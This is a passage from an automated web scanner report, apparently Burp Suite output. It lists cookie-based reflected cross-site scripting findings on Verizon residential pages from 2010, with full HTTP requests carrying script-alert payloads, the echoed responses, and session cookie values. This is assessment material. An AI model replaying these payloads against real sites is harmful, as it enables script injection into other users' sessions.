refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:52 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:52 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXbbbc1<script>alert(1)</script>763928accef </span>
...[SNIP]...

2.962. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload efb2c<script>alert(1)</script>d7c9c2d6cea was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=efb2c<script>alert(1)</script>d7c9c2d6cea; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:40 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> efb2c<script>alert(1)</script>d7c9c2d6cea</span>
...[SNIP]...

2.963. http://www22.verizon.com/residentialhelp/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 00:22:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:22:06 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span>
...[SNIP]...

2.964. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f9aa6<script>alert(1)</script>cdcfbe4067 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48782
Expires: Sat, 20 Nov 2010 02:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:51 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; expires=Sun, 20-Nov-2011 02:22:51 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:51 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong> f9aa6<script>alert(1)</script>cdcfbe4067</span>
...[SNIP]...

2.965. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eab60<script>alert(1)</script>0a0f7cbd88c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXeab60<script>alert(1)</script>0a0f7cbd88c; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48783
Expires: Sat, 20 Nov 2010 02:22:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; expires=Sun, 20-Nov-2011 02:22:49 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:49 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong>, TXeab60<script>alert(1)</script>0a0f7cbd88c </span>
...[SNIP]...

2.966. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668a0'><script>alert(1)</script>fc8df7db051 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668a0'><script>alert(1)</script>fc8df7db051; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65384
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668a0'><script>alert(1)</script>fc8df7db051; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668A0'><SCRIPT>ALERT(1)</SCRIPT>FC8DF7DB051 ' />
...[SNIP]...

2.967. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 165a7'><script>alert(1)</script>638a1bf81ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX165a7'><script>alert(1)</script>638a1bf81ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 02:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
